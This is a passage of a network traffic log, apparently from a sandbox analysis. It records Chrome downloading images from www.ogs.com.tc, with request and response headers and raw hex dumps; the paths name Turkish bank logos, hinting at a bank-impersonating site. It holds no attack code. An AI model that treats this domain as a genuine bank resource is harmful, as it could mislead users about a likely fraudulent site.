2024-05-25 22:17:22 UTC	571	IN	Data Raw: b7 ab 98 d4 42 80 e2 55 6b c6 41 bd ad 20 4c 37 30 d1 cc c6 14 4f 61 18 d7 22 ee b0 a3 b6 d9 f6 b3 b6 ba 70 71 bb 03 31 d2 ed 30 36 b2 dc 43 87 8f b7 e6 08 da c6 4e 10 d8 e4 ad b2 56 b0 36 80 1a ff 00 42 43 0a 24 26 1b 0c 5a 8d a7 74 db 5a 82 17 1b 8d 33 db 2e b3 05 59 2d a4 08 79 07 90 00 12 34 82 80 22 35 cb 5b 5c ae 61 ed 4e c5 fe 84 76 14 ad d4 72 5f 25 ea 2d f6 9b cd a5 bc ab dd 46 a2 f6 53 a5 da 5b da 4b 72 29 0e 72 2a 35 82 10 d8 d6 8c 21 1b 58 08 e0 63 04 26 30 6c 6b 53 f0 55 bc 11 ce d6 56 ba 4e d5 34 b6 aa 91 65 2a 49 b3 b8 e0 eb 9b 49 2a f9 3a 3c e4 66 21 a5 4d c4 4e 94 65 2d bd 40 91 cf 1b dc f9 b0 98 b2 3e 22 3c ee c2 72 fc 03 5c fe 5a ba e5 be 32 d6 af 1c 83 12 68 d7 51 b5 91 6e f4 34 53 eb ad 2a ec 63 19 d5 ce a4 7d 6b be 2c 93 9e 56 43 04 Data Ascii: BUkA L70Oa"pq106CNV6BC$&ZtZ3.Y-y4"5[\aNvr_%-FS[Kr)r5!Xc&0lkSUVN4eII:<f!MNe-@>"<r\Z2hQn4Sc}k,VC

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
45	192.168.2.4	49789	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	368	OUT	GET /assets/images/banks/isbank.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/jpeg Content-Length: 4990 Last-Modified: Thu, 23 May 2024 21:37:16 GMT Connection: close ETag: "664fb70c-137e" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	4990	IN	Data Raw: 52 49 46 46 76 13 00 00 57 45 42 50 56 50 38 20 6a 13 00 00 70 60 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 22 96 08 f8 50 09 09 65 6e fc 7c 99 ab eb 2d 3e 87 82 4b f5 ef e6 1f ba 3f d8 7d e4 2a 0f d8 3f aa fe c6 fe d7 ee 53 b2 b8 ba 7a ad ec df e6 7f a3 ff 83 fd ad f7 93 fe ef d8 77 e6 4f fa be e0 1f a8 5f ec bf b2 fa dd 7a 8b fd c0 f5 01 fd 17 fc e7 fd cf ee 3e ec 3f dc bf 5b 3d c1 fe ad ff d9 ff 11 fe 1b e4 03 f9 f7 f7 0f fd 1e cf 1f e1 bf ff fb 8d fe e1 7b 02 7f 39 ff 2d ff d3 d9 c3 fe 6f ed 7f c1 77 f6 4f f6 3f b7 3f 03 5f b2 7f f9 fd 80 3f ff fa 80 7f ff eb 17 ea 1f f4 4e d7 bf bc 7e 52 fa 0b e4 4f c6 fe d3 f2 9e e9 7f f6 5e 4a be bd 7d db fa 7f ee 37 e5 77 de 7f db 3f d6 fe 35 f9 b7 f0 d3 50 2f c6 3f 91 7f 77 fc b4 e1 a1 00 1f 93 7f 44 ff Data Ascii: RIFFvWEBPVP8 jp`>I$F"!"Pen\|->K?}?SzwO_z>?[={9-owO??_?N~RO^J}7w?5P/?wD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
46	192.168.2.4	49791	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:22 UTC	606	OUT	GET /assets/images/favicon-196x196.png HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://www.ogs.com.tc/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:22 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:22 GMT Content-Type: image/png Content-Length: 38550 Last-Modified: Thu, 23 May 2024 21:37:22 GMT Connection: close ETag: "664fb712-9696" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:22 UTC	16101	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c4 00 00 00 c4 08 06 00 00 01 b7 a1 be fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da e5 fd 79 78 14 c5 f6 07 8c 7f ba 67 b2 10 42 08 01 42 24 61 4d 58 05 0c 88 08 08 08 a8 08 88 0a a2 88 5c 11 54 10 dc 70 bd 82 fb 2e d7 eb c5 1d 37 40 14 14 ae 0b 2a a2 41 44 04 54 04 54 f6 7d df d7 24 93 64 32 99 bd eb fc fe e8 65 aa 7b ba 7b 7a 82 f7 fb fe de e7 ad e7 99 64 a6 bb d6 b3 d5 a9 53 a7 4e 01 00 18 63 22 00 10 91 08 2e a9 cf f9 df c6 67 56 49 57 97 d3 8a f8 67 6a 1e e3 33 cb 46 6c 7b 60 Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDIDATxyxgBB$aMX\Tp.7@*ADTT}$d2e{{zdSNc".gVIWgj3Fl{`
2024-05-25 22:17:22 UTC	16384	IN	Data Raw: 0f 95 83 af 05 3b 7a 0c aa 6d 3c a5 67 0f d4 fb ef 3c 08 8a af c0 d9 b3 67 8f 9e 7f fe f9 23 cb cb cb 8f 23 b6 c9 15 35 69 df f8 df bc 7f 05 05 05 19 9a ea c5 d9 5a b4 8f 72 cd 8d e2 71 51 8a f8 cb b2 75 22 e3 fc f3 cf 6f a4 e9 eb fb f6 eb b4 ae d8 8a bc 50 d3 9c 2a 7a 0f d0 28 ac 4f 9f 3e d7 43 ef 66 62 ea 2c 60 18 0c 60 2f 8a cc be 03 00 3e fb ec b3 1e 44 14 e1 65 7d 70 e1 e7 71 9a 62 60 ee 7c 9d d9 7b f1 e2 c5 8b 10 bb b3 34 99 7b b6 ad 53 65 65 e5 67 da 04 7d e9 20 83 29 b7 90 c2 eb ff d4 3a d0 ae 5d bb fe 88 17 1b 46 db 94 36 e1 7b 3a 5f c4 5d 9f 5c a8 af 5b 99 7f 7c dc 6a b4 43 87 0e ed 61 bd 60 73 22 67 ed bc 3e b4 74 f7 dd 77 77 63 8c 9d e0 11 20 95 7b a8 a2 f7 00 dd 5c 50 de ae 8b 76 6b bb 0a 83 67 9e 79 e6 31 24 be 36 d9 91 f7 09 54 40 36 6b d6 Data Ascii: ;zm<g<g##5iZrqQu"oP*z(O>Cfb,``/>De}pqb`\|{4{Seeg} ):]F6{:_]\[\|jCa`s"g>twwc {\Pvkgy1$6T@6k
2024-05-25 22:17:22 UTC	6065	IN	Data Raw: cd 16 c2 d8 b1 63 8b e7 cd 9b b7 08 b2 c9 4b 06 a8 cf 87 9a 47 9f 42 e8 9b 6f 65 9d 91 27 06 e5 40 39 00 08 39 d9 c8 7c 73 06 dc 97 f6 d5 21 e9 fb ef bf 9f 37 66 cc 98 e7 39 6b 92 91 19 78 e0 d8 01 05 00 70 f2 e4 c9 fb cf 3b ef bc d7 74 c8 f8 7c 11 6a 1e 7e 54 3b bf 9c 4c e2 2e 6f e5 1f 9a 32 05 44 11 ae 8e 1d 50 f7 a5 67 e5 9b 6a 14 09 69 a6 83 1b 67 25 cb f6 13 bc 77 92 47 63 08 89 01 a1 20 d8 a9 d3 88 ac 59 8b c8 ea 5f 11 dd b6 03 54 56 2e 5f 05 a6 8c 45 8b 99 04 fd cc 08 00 70 bb 21 b6 68 86 f4 db c6 23 75 f0 15 10 1a 35 34 8d 82 c1 18 63 e5 e5 e5 a7 67 cf 9e 3d 7b e6 cc 99 2b 4e 9c 38 51 06 fb eb 00 ec f0 6c 7c e6 c4 1a 64 cc 07 93 32 76 79 60 d1 9e f6 dc 3d 6f de bc 3b c1 31 03 00 84 16 7f 87 f0 d2 1f b5 08 0b 82 2e fa 94 c2 14 82 88 b4 f1 63 91 d2 Data Ascii: cKGBoe'@99\|s!7f9kxp;t\|j~T;L.o2DPgjig%wGc Y_TV._Ep!h#u54cg={+N8Ql\|d2vy`=o;1.c

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
47	192.168.2.4	49794	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	357	OUT	GET /assets/images/1.png HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	281	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/png Content-Length: 2220 Last-Modified: Thu, 23 May 2024 21:37:05 GMT Connection: close ETag: "664fb701-8ac" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	2220	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 a5 00 00 00 28 08 03 00 00 01 df dc fa 78 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 01 80 50 4c 54 45 ff ff ff fe fb fc fc dd de f8 ba bb f4 9e 9f f1 88 89 ef 78 79 ed 6f 6f ec 69 6a ec 64 65 f4 9b 9c fa d1 d1 fe f0 ef f1 85 86 eb 65 66 f3 94 95 f7 b4 b5 f9 c8 c9 fa cf d0 fa d2 d2 fa ca ca f7 b8 b8 f1 8c 8e e7 4d 4c e0 28 22 e8 53 53 ef 7c 7d e9 54 54 f5 a1 a2 fc d7 d7 fe f6 f6 e2 30 2c df 24 1b fe fc fc ff f9 f9 f6 af af e9 56 57 e7 4a 4a f2 90 92 fc dc dc e2 2e 29 f6 ab ac e6 48 48 fd f3 f2 f2 8e 8f e3 35 32 f8 c2 c3 e8 51 52 e4 37 35 f3 9c 9d fb d3 d4 e0 Data Ascii: PNGIHDR(xgAMAa cHRMz&u0`:pQ<PLTExyooijdeefML("SS\|}TT0,$VWJJ.)HH52QR75

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
48	192.168.2.4	49795	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	368	OUT	GET /assets/images/banks/finans.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/jpeg Content-Length: 6232 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-1858" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	6232	IN	Data Raw: 52 49 46 46 50 18 00 00 57 45 42 50 56 50 38 20 44 18 00 00 50 69 00 9d 01 2a f4 01 c8 00 3e 49 24 8f 45 a2 a2 21 11 4c 04 c8 28 04 84 b2 b7 70 ba fd fa 6f e7 7b 4a ba df b4 f3 6d e4 9e cb fd 34 f7 ee 3c f2 90 e5 cf fa bf 76 ff 32 bf d3 7a b0 fb d4 f7 0e fd 49 f1 80 f7 8d e6 1b f6 df f6 cf dd bf fd ef ed 7f bc 1f ec be a0 9f ce bf df 75 a1 fa 08 79 6f 7e e9 fc 2f 7f 65 ff 9b fb 6b ed 39 ff ff 59 43 c8 5f d7 ff 17 7c 28 fe c5 f9 39 e8 2f 96 0f 23 7b 2f f9 35 d2 1f ab 3c cd fe 41 f5 eb ef 3f d7 bf 6a ff 33 3f 03 fd ca f8 8b c0 17 f1 5f e5 3f df 3f 2a 7f b9 7e e4 72 2a 00 4f ca 7f aa ff b7 f5 01 fa af 32 3e c7 7b 00 7f 2c fe 9d fe af ed d3 e7 5e fd 8a 01 ff 2a fe eb ff 47 fc 6f b0 df fb df ea 7f 33 bd a5 7d 3d ff 57 fc af c0 4f f2 af eb df f1 ff c0 fb 4b ff Data Ascii: RIFFPWEBPVP8 DPi>I$E!L(po{Jm4<v2zIuyo~/ek9YC_\|(9/#{/5<A?j3?_??~rO2>{,^Go3}=WOK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
49	192.168.2.4	49797	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	366	OUT	GET /assets/images/banks/fiba.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	284	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/jpeg Content-Length: 36954 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-905a" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	16100	IN	Data Raw: ff d8 ff e1 09 7b 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 07 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 62 01 1b 00 05 00 00 00 01 00 00 00 6a 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 1f 00 00 00 72 01 32 00 02 00 00 00 14 00 00 00 91 87 69 00 04 00 00 00 01 00 00 00 a8 00 00 00 d4 00 0a fc 80 00 00 27 10 00 0a fc 80 00 00 27 10 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 33 2e 35 20 28 57 69 6e 64 6f 77 73 29 00 32 30 32 32 3a 30 39 3a 32 38 20 30 33 3a 33 31 3a 31 35 00 00 00 00 00 03 a0 01 00 03 00 00 00 01 ff ff 00 00 a0 02 00 04 00 00 00 01 00 00 01 f4 a0 03 00 04 00 00 00 01 00 00 00 c8 00 00 00 00 00 00 00 06 01 03 00 03 00 00 00 01 00 06 00 00 01 1a 00 05 00 00 00 01 00 00 01 22 01 1b 00 05 00 Data Ascii: {ExifMM*bj(1r2i''Adobe Photoshop 23.5 (Windows)2022:09:28 03:31:15"
2024-05-25 22:17:23 UTC	16384	IN	Data Raw: 4a 20 11 53 6b 8a 84 dd 7a 88 11 b1 ae e7 43 a7 a0 f8 c0 a3 92 4e a4 ef a0 18 40 8a 4a b9 13 21 07 1d 98 26 b8 af 97 44 0a 49 b3 e4 77 a5 ef 25 f5 69 dc c5 53 60 8f 45 a3 26 4f 12 28 0b fa 87 48 a2 73 84 d0 f1 0e 78 62 9e e4 9f a8 a7 c3 9e 30 26 13 eb 79 2c de c4 98 b6 d4 16 f3 0e da a4 1a 6e 48 ba 5c 73 e5 b9 25 d5 23 de 1c 39 3b c8 88 ff 00 36 65 6c 95 5f 4b b7 fb 82 1e 3e 7e 55 23 e6 a4 ab bd 01 92 67 09 a9 8b c6 8a f8 07 22 8d b3 72 d1 cd ce 9a 3b ae ac 0a f3 bc ad 71 24 09 ee 10 05 17 67 e2 21 10 a9 21 ac 3c 95 0e 3b 44 e7 df 36 24 8a 96 eb 1d 07 2d 53 52 2f cb cb 78 4b e9 4b 19 26 5a e2 0b 7b 39 52 f0 e9 d7 1f 57 56 e8 21 d9 ce df 8a 3f 4b 9f c1 3d 51 5f 00 70 7f e2 8d ae 40 7e bb 3a 6e ab 4a 71 f5 39 25 43 89 30 64 ac 67 e2 8a 73 4b 76 ce 4a c3 d9 Data Ascii: J SkzCN@J!&DIw%iS`E&O(Hsxb0&y,nH\s%#9;6el_K>~U#g"r;q$g!!<;D6$-SR/xKK&Z{9RWV!?K=Q_p@~:nJq9%C0dgsKvJ
2024-05-25 22:17:23 UTC	4470	IN	Data Raw: 11 ce 73 90 6d 5e 2a e1 27 2b 06 8a aa 8c 62 bd ca ee c9 d9 3c 4e 55 f7 aa fe fd 7d ea 87 d3 36 76 2c 5e 6f 18 96 c7 94 38 d2 b4 71 e1 40 e6 d8 71 04 88 5d 05 20 fb 86 2c 0e 5e 83 14 48 8d 7a ab 05 7e 26 20 0e ad 94 81 3a b9 eb 18 b1 64 00 c7 8b 20 67 01 a0 58 42 99 0c cf 8d 32 0c e8 c6 60 26 c0 9f 06 50 9e 23 80 ad 61 42 56 39 8f 6a 39 15 3a 62 d6 68 ad a3 b5 9e 1e c1 21 fe 36 3b 91 3d cd 78 a7 36 42 2b 7e f7 74 ea 4d c4 1a 7c 45 dd d5 8e 2a fa 86 ba c2 fa aa 6b 45 5a 86 2c 09 b3 0c c8 35 b6 30 c1 32 54 b8 d0 7c a4 47 aa 31 1a ae f6 2f 7e 95 17 6f 55 9a 11 3b f6 1e 3b 23 47 4c 46 23 be 64 97 24 36 72 d7 b7 7f 7f 8f bf 48 ba 5e 45 db 5d ab bb 78 9b 2f 47 62 21 2f 7f 7a 28 20 9a 1c 75 4f f5 7b 74 c2 19 3c f2 fb 15 49 21 ce 90 5f c2 a5 32 bc 8a bf e5 e8 7d Data Ascii: sm^'+b<NU}6v,^o8q@q] ,^Hz~& :d gXB2`&P#aBV9j9:bh!6;=x6B+~tM\|EkEZ,502T\|G1/~oU;;#GLF#d$6rH^E]x/Gb!/z( uO{t<I!_2}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
50	192.168.2.4	49798	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	366	OUT	GET /assets/images/banks/halk.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/jpeg Content-Length: 4904 Last-Modified: Thu, 23 May 2024 21:37:14 GMT Connection: close ETag: "664fb70a-1328" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	4904	IN	Data Raw: 52 49 46 46 20 13 00 00 57 45 42 50 56 50 38 20 14 13 00 00 90 61 00 9d 01 2a f4 01 c8 00 3e 49 24 90 46 22 a2 21 a1 21 f7 59 08 50 09 09 65 6e e1 75 4b e1 cf b2 7e 2e f7 c8 52 4e df fd af f6 7b fb 4f bc 5d 7f fb 9f e2 af ea 9e e7 ff ba 76 91 cb df da fe d7 3d e9 3c 4b f3 7f f2 df d3 7f bd 7e e3 fc f7 fe df fe 77 d8 af e8 0f 60 3f ea 7f cf 3a 47 f9 80 fd bf f5 36 fe e7 fa 53 ee 03 f6 0b f6 97 fc 07 c8 07 f1 ef f0 1f f8 3d a4 bf cc fb 10 7f 8b ff 59 ff ff dc 37 f9 37 f8 6f ff fe b9 7f b7 5f ff fe 50 ff b2 7f c5 fd 9e f6 a8 ff ff ec 01 ff ff d4 03 ff ff 10 f7 f3 9f c6 ef 0a 3f c2 fe 54 f6 10 f9 e7 d7 ee 4e cf 33 f5 7f f0 5f d6 3f 65 bf 2c be fd ff 21 df ff 00 bf 63 ff 83 fc b3 e1 1d 00 7f 9b 7f 3f ff 63 f9 87 e7 7d fd 7f e3 5f ba 5f 58 ff d6 fe 45 7d 00 7f Data Ascii: RIFF WEBPVP8 a*>I$F"!!YPenuK~.RN{O]v=<K~w`?:G6S=Y77o_P?TN3_?e,!c?c}__XE}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
51	192.168.2.4	49796	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	369	OUT	GET /assets/images/banks/garanti.jpg HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/jpeg Content-Length: 5268 Last-Modified: Thu, 23 May 2024 21:37:13 GMT Connection: close ETag: "664fb709-1494" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	5268	IN	Data Raw: 52 49 46 46 8c 14 00 00 57 45 42 50 56 50 38 20 80 14 00 00 30 63 00 9d 01 2a f4 01 c8 00 3e 49 24 90 45 a2 a2 21 91 5a 9c 8c 28 04 84 b3 b7 70 bb 00 86 6f 7e cd b9 67 d8 ff 85 f3 bd b3 bf 7e de 9b b2 7c ae 3c 7b f3 af f9 ff d0 3d a7 fa 85 f3 04 fd 4e f3 9e fd 49 f7 bf e6 03 f6 63 f6 c7 dd 33 fb ef ec e7 b9 cf 40 0f e3 1f ef 7a c7 bd 01 bc b2 bf 75 3e 16 bf b4 ff ca fd 99 f6 97 ff ff 9c b9 fe 03 b5 3f ee 1e 27 fe 2f f4 6f dd 7f 25 bf 76 fd fa 32 c7 d8 f6 a8 3f 22 fb 19 f9 1f ec df b5 bf 95 5f 7b 3f 88 ff 37 e2 4f 00 5f c4 ff 9c 7f 7e fc b3 fc a3 e3 8e 00 1f 98 7f 4e ff 3b f6 e7 e9 3b aa 0f 56 9e e0 1f cd ff ab ff b4 f5 ef fe 27 83 b5 00 ff a5 ff 65 ff b5 fe 5b dd 97 fa ef fd 5f eb 3d 07 fd 31 ff 97 fc ff c0 6f f3 6f ed 5f f2 3f bf f6 8d fd bb ff ff ee db Data Ascii: RIFFWEBPVP8 0c*>I$E!Z(po~g~\|<{=NIc3@zu>?'/o%v2?"_{?7O_~N;;V'e[_=1oo_?

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.4	49799	185.216.70.93	443	4340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 22:17:23 UTC	371	OUT	GET /assets/images/favicon-196x196.png HTTP/1.1 Host: www.ogs.com.tc Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-05-25 22:17:23 UTC	283	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 22:17:23 GMT Content-Type: image/png Content-Length: 38550 Last-Modified: Thu, 23 May 2024 21:37:22 GMT Connection: close ETag: "664fb712-9696" Alt-Svc: h3=":443"; ma=86400 X-Powered-By: PleskLin Accept-Ranges: bytes
2024-05-25 22:17:23 UTC	16101	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c4 00 00 00 c4 08 06 00 00 01 b7 a1 be fd 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 80 00 49 44 41 54 78 da e5 fd 79 78 14 c5 f6 07 8c 7f ba 67 b2 10 42 08 01 42 24 61 4d 58 05 0c 88 08 08 08 a8 08 88 0a a2 88 5c 11 54 10 dc 70 bd 82 fb 2e d7 eb c5 1d 37 40 14 14 ae 0b 2a a2 41 44 04 54 04 54 f6 7d df d7 24 93 64 32 99 bd eb fc fe e8 65 aa 7b ba 7b 7a 82 f7 fb fe de e7 ad e7 99 64 a6 bb d6 b3 d5 a9 53 a7 4e 01 00 18 63 22 00 10 91 08 2e a9 cf f9 df c6 67 56 49 57 97 d3 8a f8 67 6a 1e e3 33 cb 46 6c 7b 60 Data Ascii: PNGIHDRgAMAa cHRMz&u0`:pQ<bKGDIDATxyxgBB$aMX\Tp.7@*ADTT}$d2e{{zdSNc".gVIWgj3Fl{`
2024-05-25 22:17:23 UTC	16384	IN	Data Raw: 0f 95 83 af 05 3b 7a 0c aa 6d 3c a5 67 0f d4 fb ef 3c 08 8a af c0 d9 b3 67 8f 9e 7f fe f9 23 cb cb cb 8f 23 b6 c9 15 35 69 df f8 df bc 7f 05 05 05 19 9a ea c5 d9 5a b4 8f 72 cd 8d e2 71 51 8a f8 cb b2 75 22 e3 fc f3 cf 6f a4 e9 eb fb f6 eb b4 ae d8 8a bc 50 d3 9c 2a 7a 0f d0 28 ac 4f 9f 3e d7 43 ef 66 62 ea 2c 60 18 0c 60 2f 8a cc be 03 00 3e fb ec b3 1e 44 14 e1 65 7d 70 e1 e7 71 9a 62 60 ee 7c 9d d9 7b f1 e2 c5 8b 10 bb b3 34 99 7b b6 ad 53 65 65 e5 67 da 04 7d e9 20 83 29 b7 90 c2 eb ff d4 3a d0 ae 5d bb fe 88 17 1b 46 db 94 36 e1 7b 3a 5f c4 5d 9f 5c a8 af 5b 99 7f 7c dc 6a b4 43 87 0e ed 61 bd 60 73 22 67 ed bc 3e b4 74 f7 dd 77 77 63 8c 9d e0 11 20 95 7b a8 a2 f7 00 dd 5c 50 de ae 8b 76 6b bb 0a 83 67 9e 79 e6 31 24 be 36 d9 91 f7 09 54 40 36 6b d6 Data Ascii: ;zm<g<g##5iZrqQu"oP*z(O>Cfb,``/>De}pqb`\|{4{Seeg} ):]F6{:_]\[\|jCa`s"g>twwc {\Pvkgy1$6T@6k
2024-05-25 22:17:23 UTC	6065	IN	Data Raw: cd 16 c2 d8 b1 63 8b e7 cd 9b b7 08 b2 c9 4b 06 a8 cf 87 9a 47 9f 42 e8 9b 6f 65 9d 91 27 06 e5 40 39 00 08 39 d9 c8 7c 73 06 dc 97 f6 d5 21 e9 fb ef bf 9f 37 66 cc 98 e7 39 6b 92 91 19 78 e0 d8 01 05 00 70 f2 e4 c9 fb cf 3b ef bc d7 74 c8 f8 7c 11 6a 1e 7e 54 3b bf 9c 4c e2 2e 6f e5 1f 9a 32 05 44 11 ae 8e 1d 50 f7 a5 67 e5 9b 6a 14 09 69 a6 83 1b 67 25 cb f6 13 bc 77 92 47 63 08 89 01 a1 20 d8 a9 d3 88 ac 59 8b c8 ea 5f 11 dd b6 03 54 56 2e 5f 05 a6 8c 45 8b 99 04 fd cc 08 00 70 bb 21 b6 68 86 f4 db c6 23 75 f0 15 10 1a 35 34 8d 82 c1 18 63 e5 e5 e5 a7 67 cf 9e 3d 7b e6 cc 99 2b 4e 9c 38 51 06 fb eb 00 ec f0 6c 7c e6 c4 1a 64 cc 07 93 32 76 79 60 d1 9e f6 dc 3d 